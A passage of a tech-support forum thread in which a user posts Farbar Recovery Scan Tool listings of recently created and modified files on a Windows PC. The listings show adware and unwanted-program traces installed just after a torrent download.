    2015-12-29 16:02 - 2015-12-29 16:02 - 02171904 _____ (Microsoft Corporation) C:\Windows\system32\SystemSettingsAdminFlowUI.dll
    2015-12-29 16:02 - 2015-12-29 16:02 - 01091072 _____ (Microsoft Corporation) C:\Windows\system32\MrmCoreR.dll
    2015-12-29 16:02 - 2015-12-29 16:02 - 00790528 _____ (Microsoft Corporation) C:\Windows\SysWOW64\MrmCoreR.dll
    2015-12-29 16:02 - 2015-12-29 16:02 - 00672984 _____ (Microsoft Corporation) C:\Windows\system32\MDMAgent.exe
    2015-12-29 16:02 - 2015-12-29 16:02 - 00463872 _____ (Microsoft Corporation) C:\Windows\system32\SystemSettings.Handlers.dll
    2015-12-29 16:02 - 2015-12-29 16:02 - 00273240 _____ (Microsoft Corporation) C:\Windows\system32\SystemSettingsAdminFlows.exe
    2015-12-29 16:02 - 2015-12-29 16:02 - 00116736 _____ (Microsoft Corporation) C:\Windows\system32\SystemSettingsDatabase.dll
    2015-12-29 15:54 - 2015-12-29 15:54 - 83947520 _____ C:\Windows\system32\config\SOFTWARE.iobit
    2015-12-29 15:54 - 2015-12-29 15:54 - 00311296 _____ C:\Windows\system32\config\DEFAULT.iobit
    2015-12-29 15:54 - 2015-12-29 15:54 - 00065536 _____ C:\Windows\system32\config\SAM.iobit
    2015-12-29 15:54 - 2015-12-29 15:54 - 00028672 _____ C:\Windows\system32\config\SECURITY.iobit
    2015-12-29 15:53 - 2015-12-29 16:27 - 00192216 _____ (Malwarebytes) C:\Windows\system32\Drivers\MBAMSwissArmy.sys
    2015-12-29 15:52 - 2015-12-29 15:52 - 00002366 _____ C:\Windows\System32\Tasks\ASC8_SkipUac_hersheychoco9
    2015-12-29 15:52 - 2015-12-29 15:52 - 00000250 _____ C:\Windows\Tasks\ASC8_SkipUac_hersheychoco9.job
    2015-12-29 15:11 - 2015-12-29 15:11 - 00000000 _____ C:\Users\hersheychoco9\Desktop\sfcdetails.txt
    2015-12-29 14:35 - 2015-12-29 14:35 - 00000000 ____D C:\Windows\pss
    2015-12-29 03:32 - 2015-12-29 03:32 - 00000529 _____ C:\Users\hersheychoco9\Desktop\UsbFix.lnk
    2015-12-29 03:32 - 2015-12-29 03:32 - 00000000 ____D C:\UsbFix
    2015-12-29 01:12 - 2015-12-29 01:12 - 00009084 _____ C:\WirelessDiagLog.csv
    2015-12-28 23:37 - 2015-12-28 23:37 - 00000000 ____D C:\Windows\system32\uopu
    2015-12-28 23:31 - 2015-12-28 23:44 - 00000000 ____D C:\Users\hersheychoco9\AppData\Roaming\Opera Software
    2015-12-28 23:31 - 2015-12-28 23:44 - 00000000 ____D C:\Users\hersheychoco9\AppData\Local\Opera Software
    2015-12-28 23:29 - 2015-12-28 23:29 - 00004006 _____ C:\Windows\System32\Tasks\LaunchPreSignup
    2015-12-28 23:29 - 2015-12-28 23:29 - 00003588 _____ C:\Windows\System32\Tasks\Only-search Updater
    2015-12-28 23:29 - 2015-12-28 23:29 - 00000000 ____D C:\Program Files (x86)\onlysearch
    2015-12-28 23:27 - 2015-12-29 16:00 - 00000000 ____D C:\Users\hersheychoco9\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\ASPackage
    2015-12-28 23:27 - 2015-12-28 23:27 - 00000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\WajaNetEn
    2015-12-28 23:27 - 2015-12-28 23:27 - 00000000 ____D C:\Program Files (x86)\4C4C4544-1451366851-3310-8034-C4C04F343032
    2015-12-28 23:26 - 2015-12-28 23:34 - 00000883 _____ C:\Windows\SysWOW64\${LOGFILE}
    2015-12-28 23:25 - 2015-12-28 23:25 - 00000000 ____D C:\ProgramData\62f92eec-4927-1
    2015-12-28 23:25 - 2015-12-28 23:25 - 00000000 ____D C:\ProgramData\62f92eec-4791-0
    2015-12-28 23:17 - 2015-12-28 23:17 - 00000000 ____D C:\Program Files (x86)\ExploreTech
    2015-12-28 23:16 - 2015-12-28 23:16 - 00001520 _____ C:\ProgramData\tempimage.bmp
    2015-12-28 23:09 - 2015-12-28 23:09 - 00023072 _____ C:\Windows\System32\Tasks\{0F0F7D47-7E08-7D0B-7811-7D0C050B110D}
    2015-12-28 23:09 - 2015-12-28 23:09 - 00003304 _____ C:\Windows\System32\Tasks\IBUpd2
    2015-12-28 23:09 - 2015-12-28 23:09 - 00000000 ____D C:\Program Files (x86)\PCAPDownloader
    2015-12-28 23:08 - 2015-12-28 23:09 - 00000000 ____D C:\Users\hersheychoco9\AppData\Local\BrowserAir
    2015-12-28 23:08 - 2015-12-28 23:08 - 00004784 _____ C:\Windows\SysWOW64\Comvud.ini
    2015-12-28 23:08 - 2015-12-28 23:08 - 00003354 _____ C:\Windows\System32\Tasks\Ijufcyl
    2015-12-28 23:08 - 2015-12-28 23:08 - 00002504 _____ C:\Windows\SysWOW64\ComvudOff.ini
    2015-12-28 23:08 - 2015-12-28 23:08 - 00002504 _____ C:\Windows\system32\ComvudOff.ini
    2015-12-28 23:08 - 2015-12-28 23:08 - 00000000 ____D C:\Users\hersheychoco9\AppData\LocalLow\Company
    2015-12-28 23:08 - 2015-12-28 23:08 - 00000000 ____D C:\Users\hersheychoco9\AppData\LocalLow\{D2020D47-707D-4E26-B4D9-739C4F4C2E9A}
    2015-12-28 23:08 - 2015-12-28 23:08 - 00000000 ____D C:\Users\hersheychoco9\AppData\Local\Tempfolder
    2015-12-28 23:08 - 2015-12-28 23:08 - 00000000 ____D C:\uninst
    2015-12-28 23:08 - 2015-12-28 23:08 - 00000000 ____D C:\ProgramData\33010bcc-5741-1
    2015-12-28 23:08 - 2015-12-28 23:08 - 00000000 ____D C:\ProgramData\33010bcc-4455-0
    2015-12-28 23:08 - 2015-12-28 22:01 - 00768368 _____ C:\Windows\system32\Comvud64.dll
    2015-12-28 23:07 - 2015-12-29 06:00 - 00000000 ____D C:\Users\hersheychoco9\AppData\Roaming\Seventh
    2015-12-28 23:07 - 2015-12-28 23:07 - 00003522 _____ C:\Windows\System32\Tasks\Genius_Interval
    2015-12-28 23:07 - 2015-12-28 23:07 - 00003304 _____ C:\Windows\System32\Tasks\Easy Driver Pro Schedule
    2015-12-28 23:07 - 2015-12-28 23:07 - 00003208 _____ C:\Windows\System32\Tasks\Seventh
    2015-12-28 23:07 - 2015-12-28 23:07 - 00003204 _____ C:\Windows\System32\Tasks\Genius
    2015-12-28 23:07 - 2015-12-28 23:07 - 00003200 _____ C:\Windows\System32\Tasks\Sixth
    2015-12-28 23:07 - 2015-12-28 23:07 - 00000000 ____D C:\Users\hersheychoco9\Documents\Probit Software
    2015-12-28 23:07 - 2015-12-28 23:07 - 00000000 ____D C:\Users\hersheychoco9\AppData\Roaming\Sixth
    2015-12-28 23:07 - 2015-12-28 23:07 - 00000000 ____D C:\Users\hersheychoco9\AppData\Roaming\Genius
    2015-12-28 23:07 - 2015-12-28 23:07 - 00000000 ____D C:\Users\hersheychoco9\AppData\Roaming\FunFeedr
    2015-12-28 23:07 - 2015-12-28 23:07 - 00000000 ____D C:\Users\hersheychoco9\AppData\Roaming\Common
    2015-12-28 23:06 - 2015-12-29 16:00 - 00000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\DailyPCClean
    2015-12-28 23:06 - 2015-12-28 23:37 - 00000000 ____D C:\Program Files (x86)\DailyPCClean
    2015-12-28 23:06 - 2015-12-28 23:06 - 00000000 ____D C:\Users\hersheychoco9\Documents\DailyPCClean
    2015-12-28 23:06 - 2015-12-28 23:06 - 00000000 ____D C:\Users\hersheychoco9\AppData\Roaming\DailyPCClean
    2015-12-28 23:05 - 2015-12-28 23:05 - 00000000 ____D C:\Windows\Update Pro
    2015-12-28 23:05 - 2015-12-28 23:05 - 00000000 ____D C:\Users\hersheychoco9\AppData\Roaming\DhcpUpdater
    2015-12-28 23:04 - 2015-12-28 23:13 - 00000000 ____D C:\Users\hersheychoco9\AppData\Local\TrailerTime
    2015-12-28 23:04 - 2015-12-28 23:04 - 00003214 _____ C:\Windows\System32\Tasks\Pool Component
    2015-12-28 23:04 - 2015-12-28 23:04 - 00003204 _____ C:\Windows\System32\Tasks\Pool Component2
    2015-12-28 23:04 - 2015-12-28 23:04 - 00000000 ____D C:\Users\hersheychoco9\AppData\Local\Pool Component
    2015-12-28 23:04 - 2015-12-28 23:04 - 00000000 ____D C:\Program Files (x86)\4C4C4544-1451365457-3310-8034-C4C04F343032
    2015-12-28 23:03 - 2015-12-28 23:37 - 00000000 ____D C:\Program Files\WajaNetEn
    2015-12-28 23:02 - 2015-12-28 23:37 - 00000000 ____D C:\Program Files (x86)\Probit Software
    2015-12-28 23:02 - 2015-12-28 23:30 - 00000000 ____D C:\Users\hersheychoco9\AppData\Roaming\WTools
    2015-12-28 23:02 - 2015-12-28 23:26 - 00000000 ____D C:\Users\hersheychoco9\AppData\Roaming\Store
    2015-12-28 23:01 - 2015-12-28 23:34 - 00000000 ____D C:\Users\hersheychoco9\AppData\Roaming\Nosibay
    2015-12-28 23:00 - 2015-12-29 06:00 - 00000000 ____D C:\Users\hersheychoco9\AppData\Roaming\NUIns
    2015-12-28 23:00 - 2015-12-28 23:00 - 00000000 ____D C:\Program Files (x86)\4C4C4544-1451365214-3310-8034-C4C04F343032
    2015-12-28 22:57 - 2015-12-28 23:37 - 00000000 ____D C:\Program Files (x86)\sushileads
    2015-12-28 22:57 - 2015-12-28 22:57 - 00009216 _____ C:\Users\hersheychoco9\AppData\Local\ezvtum.dll
    2015-12-28 22:57 - 2015-12-28 22:57 - 00003534 _____ C:\Windows\System32\Tasks\SushiLeads
    2015-12-28 22:57 - 2015-12-28 22:57 - 00002560 _____ C:\Users\hersheychoco9\AppData\Local\uninstall.exe
    2015-12-28 22:55 - 2015-12-28 22:55 - 02669034 _____ C:\Users\hersheychoco9\Downloads\The+Men+of+Yoshiwara+Kiku.zip
    2015-12-28 22:29 - 2015-12-28 22:29 - 00271609 _____ C:\Users\hersheychoco9\Downloads\[kat.cr]the.men.of.yoshiwara.kikuya.gyakuten.yoshiwara.visual.novel.english.torrent
    2015-12-28 22:28 - 2015-10-29 14:02 - 00000015 _____ C:\Users\hersheychoco9\Downloads\USE PASSWORD - 12345.txt
    2015-12-21 23:44 - 2015-12-21 23:44 - 00000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Skype
    2015-12-20 02:01 - 2015-12-20 02:01 - 00000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Bluetooth Devices
    2015-12-10 19:26 - 2014-03-06 03:22 - 00134144 _____ (Microsoft Corporation) C:\Windows\system32\Drivers\dfsc.sys
    2015-12-10 19:25 - 2014-03-06 03:24 - 00111616 ____C (Microsoft Corporation) C:\Windows\system32\Drivers\hidclass.sys
    2015-12-10 19:25 - 2014-03-06 03:24 - 00033280 ____C (Microsoft Corporation) C:\Windows\system32\Drivers\hidusb.sys
    2015-12-10 19:25 - 2014-03-06 03:19 - 00049152 _____ (Microsoft Corporation) C:\Windows\system32\Drivers\tcpipreg.sys
    2015-12-09 13:49 - 2015-12-01 11:19 - 00826872 _____ (Adobe Systems Incorporated) C:\Windows\SysWOW64\FlashPlayerApp.exe
    2015-12-09 13:49 - 2015-12-01 11:19 - 00176632 _____ (Adobe Systems Incorporated) C:\Windows\SysWOW64\FlashPlayerCPLApp.cpl
    2015-12-09 13:37 - 2015-12-09 13:38 - 00000000 ___SD C:\Windows\system32\CompatTel
    2015-12-09 13:30 - 2015-11-22 00:59 - 07455064 _____ (Microsoft Corporation) C:\Windows\system32\ntoskrnl.exe
    2015-12-09 13:30 - 2015-11-22 00:59 - 01735000 _____ (Microsoft Corporation) C:\Windows\system32\ntdll.dll
    2015-12-09 13:30 - 2015-11-22 00:59 - 01659568 _____ (Microsoft Corporation) C:\Windows\system32\winload.efi
    2015-12-09 13:30 - 2015-11-22 00:59 - 01519592 _____ (Microsoft Corporation) C:\Windows\system32\winload.exe
    2015-12-09 13:30 - 2015-11-22 00:59 - 01487008 _____ (Microsoft Corporation) C:\Windows\system32\winresume.efi
    2015-12-09 13:30 - 2015-11-22 00:59 - 01355848 _____ (Microsoft Corporation) C:\Windows\system32\winresume.exe
    2015-12-09 13:30 - 2015-11-22 00:58 - 01499920 _____ (Microsoft Corporation) C:\Windows\SysWOW64\ntdll.dll
    2015-12-09 13:30 - 2015-11-21 12:32 - 00016896 _____ (Microsoft Corporation) C:\Windows\system32\ntvdm64.dll
    2015-12-09 13:30 - 2015-11-21 11:50 - 00014336 _____ (Microsoft Corporation) C:\Windows\SysWOW64\ntvdm64.dll
    2015-12-09 13:30 - 2015-11-21 10:59 - 01706496 _____ (Microsoft Corporation) C:\Windows\system32\comsvcs.dll
    2015-12-09 13:30 - 2015-11-21 10:49 - 01344000 _____ (Microsoft Corporation) C:\Windows\SysWOW64\comsvcs.dll
    2015-12-09 13:30 - 2015-11-21 10:47 - 00522240 _____ (Microsoft Corporation) C:\Windows\system32\catsrvut.dll
    2015-12-09 13:30 - 2015-11-21 10:40 - 00414208 _____ (Microsoft Corporation) C:\Windows\SysWOW64\catsrvut.dll
    2015-12-09 13:30 - 2015-11-11 10:21 - 25837568 _____ (Microsoft Corporation) C:\Windows\system32\mshtml.dll
    2015-12-09 13:30 - 2015-11-11 10:00 - 12856832 _____ (Microsoft Corporation) C:\Windows\SysWOW64\ieframe.dll
    2015-12-09 13:30 - 2015-11-11 09:44 - 00279040 _____ (Microsoft Corporation) C:\Windows\SysWOW64\dxtrans.dll
    2015-12-09 13:30 - 2015-11-11 09:44 - 00128000 _____ (Microsoft Corporation) C:\Windows\SysWOW64\iepeers.dll
    2015-12-09 13:30 - 2015-11-11 09:41 - 20366848 _____ (Microsoft Corporation) C:\Windows\SysWOW64\mshtml.dll
    2015-12-09 13:30 - 2015-11-11 09:12 - 00092160 _____ (Microsoft Corporation) C:\Windows\system32\mshtmled.dll
    2015-12-09 13:30 - 2015-11-09 18:13 - 00496640 _____ (Microsoft Corporation) C:\Windows\SysWOW64\vbscript.dll
    2015-12-09 13:30 - 2015-11-09 18:11 - 00064000 _____ (Microsoft Corporation) C:\Windows\SysWOW64\MshtmlDac.dll
    2015-12-09 13:30 - 2015-11-09 18:08 - 02280448 _____ (Microsoft Corporation) C:\Windows\SysWOW64\iertutil.dll
    2015-12-09 13:30 - 2015-11-09 18:04 - 00476160 _____ (Microsoft Corporation) C:\Windows\SysWOW64\ieui.dll
    2015-12-09 13:30 - 2015-11-09 18:02 - 00663552 _____ (Microsoft Corporation) C:\Windows\SysWOW64\jscript.dll
    2015-12-09 13:30 - 2015-11-09 17:46 - 04514816 _____ (Microsoft Corporation) C:\Windows\SysWOW64\jscript9.dll
    2015-12-09 13:30 - 2015-11-09 17:41 - 00880128 _____ (Microsoft Corporation) C:\Windows\SysWOW64\inetcomm.dll
    2015-12-09 13:30 - 2015-11-09 17:37 - 00230400 _____ (Microsoft Corporation) C:\Windows\SysWOW64\webcheck.dll
    2015-12-09 13:30 - 2015-11-09 17:36 - 02050560 _____ (Microsoft Corporation) C:\Windows\SysWOW64\inetcpl.cpl
    2015-12-09 13:30 - 2015-11-09 17:36 - 00687104 _____ (Microsoft Corporation) C:\Windows\SysWOW64\msfeeds.dll
    2015-12-09 13:30 - 2015-11-09 17:36 - 00325632 _____ (Microsoft Corporation) C:\Windows\SysWOW64\iedkcs32.dll
    2015-12-09 13:30 - 2015-11-09 17:25 - 01048576 _____ (Microsoft Corporation) C:\Windows\SysWOW64\actxprxy.dll
    2015-12-09 13:30 - 2015-11-09 17:17 - 02011136 _____ (Microsoft Corporation) C:\Windows\SysWOW64\wininet.dll
    2015-12-09 13:30 - 2015-11-09 17:14 - 01311744 _____ (Microsoft Corporation) C:\Windows\SysWOW64\urlmon.dll
    2015-12-09 13:30 - 2015-11-09 17:12 - 00710144 _____ (Microsoft Corporation) C:\Windows\SysWOW64\ieapfltr.dll
    2015-12-09 13:30 - 2015-11-08 18:41 - 01540728 _____ (Microsoft Corporation) C:\Windows\system32\user32.dll
    2015-12-09 13:30 - 2015-11-08 16:30 - 04176384 _____ (Microsoft Corporation) C:\Windows\system32\win32k.sys
    2015-12-09 13:30 - 2015-11-08 16:15 - 02887168 _____ (Microsoft Corporation) C:\Windows\system32\iertutil.dll
    2015-12-09 13:30 - 2015-11-08 16:15 - 00571392 _____ (Microsoft Corporation) C:\Windows\system32\vbscript.dll
    2015-12-09 13:30 - 2015-11-08 16:04 - 05923840 _____ (Microsoft Corporation) C:\Windows\system32\jscript9.dll
    2015-12-09 13:30 - 2015-11-08 16:02 - 00615936 _____ (Microsoft Corporation) C:\Windows\system32\ieui.dll
    2015-12-09 13:30 - 2015-11-08 16:01 - 00817664 _____ (Microsoft Corporation) C:\Windows\system32\jscript.dll
    2015-12-09 13:30 - 2015-11-08 15:32 - 00315392 _____ (Microsoft Corporation) C:\Windows\system32\dxtrans.dll
    2015-12-09 13:30 - 2015-11-08 15:32 - 00145408 _____ (Microsoft Corporation) C:\Windows\system32\iepeers.dll
    2015-12-09 13:30 - 2015-11-08 15:25 - 01032704 _____ (Microsoft Corporation) C:\Windows\system32\inetcomm.dll
    2015-12-09 13:30 - 2015-11-08 15:23 - 01994752 _____ (Microsoft Corporation) C:\Windows\system32\DWrite.dll
    2015-12-09 13:30 - 2015-11-08 15:18 - 00262144 _____ (Microsoft Corporation) C:\Windows\system32\webcheck.dll
    2015-12-09 13:30 - 2015-11-08 15:16 - 00372224 _____ (Microsoft Corporation) C:\Windows\system32\iedkcs32.dll
    2015-12-09 13:30 - 2015-11-08 15:15 - 00798208 _____ (Microsoft Corporation) C:\Windows\system32\msfeeds.dll
    2015-12-09 13:30 - 2015-11-08 15:15 - 00718336 _____ (Microsoft Corporation) C:\Windows\system32\ie4uinit.exe
    2015-12-09 13:30 - 2015-11-08 15:14 - 14456832 _____ (Microsoft Corporation) C:\Windows\system32\ieframe.dll
    2015-12-09 13:30 - 2015-11-08 15:13 - 02123264 _____ (Microsoft Corporation) C:\Windows\system32\inetcpl.cpl
    2015-12-09 13:30 - 2015-11-08 15:13 - 01383936 _____ (Microsoft Corporation) C:\Windows\system32\FntCache.dll
    2015-12-09 13:30 - 2015-11-08 15:01 - 01753600 _____ (Microsoft Corporation) C:\Windows\system32\GdiPlus.dll
    2015-12-09 13:30 - 2015-11-08 14:53 - 02880000 _____ (Microsoft Corporation) C:\Windows\system32\actxprxy.dll
    2015-12-09 13:30 - 2015-11-08 14:53 - 02487808 _____ (Microsoft Corporation) C:\Windows\system32\wininet.dll
    2015-12-09 13:30 - 2015-11-08 14:52 - 01559552 _____ (Microsoft Corporation) C:\Windows\SysWOW64\DWrite.dll
    2015-12-09 13:30 - 2015-11-08 14:48 - 01376256 _____ (Microsoft Corporation) C:\Windows\SysWOW64\user32.dll
    2015-12-09 13:30 - 2015-11-08 14:42 - 01490944 _____ (Microsoft Corporation) C:\Windows\SysWOW64\GdiPlus.dll
    2015-12-09 13:30 - 2015-11-08 14:41 - 01546752 _____ (Microsoft Corporation) C:\Windows\system32\urlmon.dll
    2015-12-09 13:30 - 2015-11-08 14:30 - 00800768 _____ (Microsoft Corporation) C:\Windows\system32\ieapfltr.dll
    2015-12-09 13:30 - 2015-11-05 02:59 - 00145408 _____ (Microsoft Corporation) C:\Windows\system32\Drivers\rmcast.sys
    2015-12-09 13:29 - 2015-11-20 16:47 - 00136904 _____ (Microsoft Corporation) C:\Windows\system32\wuauclt.exe
    2015-12-09 13:29 - 2015-11-20 12:18 - 00052224 _____ (Microsoft Corporation) C:\Windows\system32\wups2.dll
    2015-12-09 13:29 - 2015-11-20 10:58 - 03706880 _____ (Microsoft Corporation) C:\Windows\system32\wuaueng.dll
    2015-12-09 13:29 - 2015-11-20 10:47 - 00035840 _____ (Microsoft Corporation) C:\Windows\system32\wuapp.exe
    2015-12-09 13:29 - 2015-11-20 10:46 - 00140288 _____ (Microsoft Corporation) C:\Windows\system32\wuwebv.dll
    2015-12-09 13:29 - 2015-11-20 10:44 - 00409088 _____ (Microsoft Corporation) C:\Windows\system32\WUSettingsProvider.dll
    2015-12-09 13:29 - 2015-11-20 10:44 - 00095744 _____ (Microsoft Corporation) C:\Windows\system32\wudriver.dll
    2015-12-09 13:29 - 2015-11-20 10:43 - 00897024 _____ (Microsoft Corporation) C:\Windows\system32\wuapi.dll
    2015-12-09 13:29 - 2015-11-20 10:42 - 02243584 _____ (Microsoft Corporation) C:\Windows\system32\wucltux.dll
    2015-12-09 13:29 - 2015-11-20 10:30 - 00029696 _____ (Microsoft Corporation) C:\Windows\SysWOW64\wuapp.exe
    2015-12-09 13:29 - 2015-11-20 10:29 - 00124928 _____ (Microsoft Corporation) C:\Windows\SysWOW64\wuwebv.dll
    2015-12-09 13:29 - 2015-11-20 10:28 - 00081920 _____ (Microsoft Corporation) C:\Windows\SysWOW64\wudriver.dll
    2015-12-09 13:29 - 2015-11-20 10:27 - 00726528 _____ (Microsoft Corporation) C:\Windows\SysWOW64\wuapi.dll
    2015-12-09 13:29 - 2015-10-28 09:49 - 02775552 _____ (Microsoft Corporation) C:\Windows\system32\authui.dll
    2015-12-09 13:29 - 2015-10-28 09:29 - 02462720 _____ (Microsoft Corporation) C:\Windows\SysWOW64\authui.dll
    2015-12-06 00:57 - 2015-07-30 08:04 - 00124624 _____ (Microsoft Corporation) C:\Windows\system32\PresentationCFFRasterizerNative_v0300.dll
    2015-12-06 00:57 - 2015-07-30 07:48 - 00103120 _____ (Microsoft Corporation) C:\Windows\SysWOW64\PresentationCFFRasterizerNative_v0300.dll
     
  5. hersheychoco

    hersheychoco TS Rookie Topic Starter Posts: 30

    ==================== One Month Modified files and folders ========

    (If an entry is included in the fixlist, the file/folder will be moved.)

    2016-01-05 17:08 - 2013-08-22 07:36 - 00000000 ____D C:\WINDOWS
    2016-01-05 17:06 - 2013-08-22 09:20 - 00000000 ____D C:\Windows\CbsTemp
    2016-01-05 17:05 - 2014-11-21 23:28 - 00000930 _____ C:\Windows\Tasks\GoogleUpdateTaskMachineUA.job
    2016-01-05 16:56 - 2014-05-13 21:39 - 00000000 ____D C:\Program Files (x86)\Dell Backup and Recovery
    2016-01-05 16:54 - 2014-05-13 21:18 - 00865408 _____ C:\Windows\system32\PerfStringBackup.INI
    2016-01-05 16:54 - 2013-08-22 07:36 - 00000000 ____D C:\Windows\Inf
    2016-01-05 16:51 - 2015-03-11 08:30 - 00000000 ___DO C:\Users\hersheychoco9\OneDrive
    2016-01-05 16:50 - 2015-09-21 21:29 - 00000000 ____D C:\ProgramData\ProductData
    2016-01-05 16:50 - 2014-11-21 23:28 - 00000926 _____ C:\Windows\Tasks\GoogleUpdateTaskMachineCore.job
    2016-01-05 16:49 - 2014-10-10 07:49 - 00000318 _____ C:\Windows\system32\ayboot.ini
    2016-01-05 16:48 - 2013-08-22 08:45 - 00000006 ____H C:\Windows\Tasks\SA.DAT
    2015-12-29 17:16 - 2013-08-22 09:36 - 00000000 ____D C:\Windows\system32\NDF
    2015-12-29 17:12 - 2014-05-13 20:56 - 00000000 ____D C:\Windows\Panther
    2015-12-29 17:06 - 2013-08-22 09:36 - 00000000 ___RD C:\Windows\ImmersiveControlPanel
    2015-12-29 17:01 - 2014-10-10 05:14 - 00003598 _____ C:\Windows\System32\Tasks\Optimize Start Menu Cache Files-S-1-5-21-1030869394-3123877279-975090705-1001
    2015-12-29 16:42 - 2014-10-10 08:41 - 00000000 ____D C:\Program Files (x86)\Steam
    2015-12-29 15:59 - 2015-01-03 03:31 - 00000000 ____D C:\Users\hersheychoco9\AppData\Roaming\Azureus
    2015-12-29 15:49 - 2014-10-16 23:09 - 00000000 ____D C:\Users\hersheychoco9\AppData\Roaming\PCDr
    2015-12-29 14:14 - 2013-08-22 09:36 - 00000000 ____D C:\Windows\Registration
    2015-12-29 02:25 - 2014-11-21 18:42 - 00000000 ____D C:\Users\hersheychoco9\AppData\Local\Adobe
    2015-12-29 01:15 - 2014-10-10 05:40 - 00000000 ____D C:\Users\hersheychoco9\AppData\Local\ElevatedDiagnostics
    2015-12-29 00:33 - 2014-10-10 06:46 - 00000000 __SHD C:\Users\hersheychoco9\AppData\LocalLow\EmieUserList
    2015-12-29 00:33 - 2014-10-10 06:46 - 00000000 __SHD C:\Users\hersheychoco9\AppData\LocalLow\EmieSiteList
    2015-12-29 00:23 - 2015-09-21 21:29 - 00000318 _____ C:\Windows\Tasks\Uninstaller_SkipUac_hersheychoco9.job
    2015-12-29 00:20 - 2015-09-21 21:29 - 00002434 _____ C:\Windows\System32\Tasks\Uninstaller_SkipUac_hersheychoco9
    2015-12-28 23:43 - 2015-12-05 21:35 - 00498688 _____ (Microsoft Corporation) C:\Windows\SysWOW64\dnsapi.dll
    2015-12-28 23:38 - 2013-08-22 08:44 - 05011720 _____ C:\Windows\system32\FNTCACHE.DAT
    2015-12-28 23:36 - 2014-10-08 11:14 - 00000000 ____D C:\Users\hersheychoco9
    2015-12-28 23:34 - 2014-10-10 06:46 - 00000000 __SHD C:\Users\hersheychoco9\AppData\Local\EmieUserList
    2015-12-28 23:34 - 2014-10-10 06:46 - 00000000 __SHD C:\Users\hersheychoco9\AppData\Local\EmieSiteList
    2015-12-28 23:27 - 2013-08-22 07:25 - 00000226 _____ C:\Windows\win.ini
    2015-12-28 23:14 - 2014-11-21 23:29 - 00002419 _____ C:\Users\Public\Desktop\Google Chrome.lnk
    2015-12-28 23:08 - 2014-10-08 11:15 - 00001628 _____ C:\Users\hersheychoco9\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Internet Explorer.lnk
    2015-12-28 22:29 - 2015-01-03 03:31 - 00000000 ____D C:\Users\hersheychoco9\Documents\Vuze Downloads
    2015-12-28 22:28 - 2015-01-03 03:31 - 00000000 ____D C:\Program Files\Vuze
    2015-12-28 19:33 - 2014-10-19 20:11 - 00000000 ____D C:\Users\hersheychoco9\AppData\Roaming\Skype
    2015-12-25 20:51 - 2015-05-14 19:14 - 00000000 ____D C:\Users\hersheychoco9\AppData\Roaming\Curse Client
    2015-12-23 23:38 - 2015-02-18 23:09 - 00000000 ____D C:\Users\hersheychoco9\AppData\Local\Steam
    2015-12-21 23:44 - 2015-08-22 10:12 - 00002713 _____ C:\Users\Public\Desktop\Skype.lnk
    2015-12-21 23:44 - 2014-10-19 20:11 - 00000000 ___RD C:\Program Files (x86)\Skype
    2015-12-21 23:44 - 2014-10-19 20:11 - 00000000 ____D C:\Users\hersheychoco9\AppData\Local\Skype
    2015-12-21 23:44 - 2014-10-19 20:10 - 00000000 ____D C:\ProgramData\Skype
    2015-12-20 01:43 - 2015-05-01 20:00 - 00000132 _____ C:\Users\hersheychoco9\AppData\Roaming\Adobe PNG Format CS5 Prefs
    2015-12-20 00:44 - 2013-08-22 07:25 - 00262144 ___SH C:\Windows\system32\config\BBI
    2015-12-17 20:08 - 2013-08-22 09:36 - 00000000 ____D C:\Windows\rescache
    2015-12-13 19:52 - 2014-05-13 21:21 - 00000000 ____D C:\ProgramData\Dell
    2015-12-09 13:38 - 2013-08-22 13:12 - 00000000 ____D C:\Program Files\Windows Journal
    2015-12-09 13:38 - 2013-08-22 09:36 - 00000000 ___SD C:\Windows\system32\dsc
    2015-12-09 13:38 - 2013-08-22 09:36 - 00000000 ___RD C:\Windows\ToastData
    2015-12-09 13:38 - 2013-08-22 09:36 - 00000000 ____D C:\Windows\WinStore
    2015-12-09 13:38 - 2013-08-22 09:36 - 00000000 ____D C:\Windows\SysWOW64\setup
    2015-12-09 13:38 - 2013-08-22 09:36 - 00000000 ____D C:\Windows\SysWOW64\migwiz
    2015-12-09 13:38 - 2013-08-22 09:36 - 00000000 ____D C:\Windows\SysWOW64\Com
    2015-12-09 13:38 - 2013-08-22 09:36 - 00000000 ____D C:\Windows\system32\WinBioPlugIns
    2015-12-09 13:38 - 2013-08-22 09:36 - 00000000 ____D C:\Windows\system32\SystemResetPlatform
    2015-12-09 13:38 - 2013-08-22 09:36 - 00000000 ____D C:\Windows\system32\setup
    2015-12-09 13:38 - 2013-08-22 09:36 - 00000000 ____D C:\Windows\system32\SecureBootUpdates
    2015-12-09 13:38 - 2013-08-22 09:36 - 00000000 ____D C:\Windows\system32\migwiz
    2015-12-09 13:38 - 2013-08-22 09:36 - 00000000 ____D C:\Windows\system32\Com
    2015-12-09 13:38 - 2013-08-22 09:36 - 00000000 ____D C:\Windows\MediaViewer
    2015-12-09 13:38 - 2013-08-22 09:36 - 00000000 ____D C:\Windows\IME
    2015-12-09 13:38 - 2013-08-22 09:36 - 00000000 ____D C:\Windows\FileManager
    2015-12-09 13:38 - 2013-08-22 09:36 - 00000000 ____D C:\Windows\Camera
    2015-12-09 13:38 - 2013-08-22 09:36 - 00000000 ____D C:\Program Files\Windows Portable Devices
    2015-12-09 13:38 - 2013-08-22 09:36 - 00000000 ____D C:\Program Files\Windows Photo Viewer
    2015-12-09 13:38 - 2013-08-22 09:36 - 00000000 ____D C:\Program Files\Windows Multimedia Platform
    2015-12-09 13:38 - 2013-08-22 09:36 - 00000000 ____D C:\Program Files\Common Files\System
    2015-12-09 13:38 - 2013-08-22 07:36 - 00000000 ____D C:\Windows\SysWOW64\oobe
    2015-12-09 13:38 - 2013-08-22 07:36 - 00000000 ____D C:\Windows\SysWOW64\Dism
    2015-12-09 13:38 - 2013-08-22 07:36 - 00000000 ____D C:\Windows\system32\Sysprep
    2015-12-09 13:38 - 2013-08-22 07:36 - 00000000 ____D C:\Windows\system32\oobe
    2015-12-09 13:38 - 2013-08-22 07:36 - 00000000 ____D C:\Windows\system32\Dism
    2015-12-09 13:38 - 2013-08-22 07:36 - 00000000 ____D C:\Windows\servicing
    2015-12-09 13:37 - 2013-08-22 09:36 - 00000000 ____D C:\Windows\SysWOW64\InputMethod
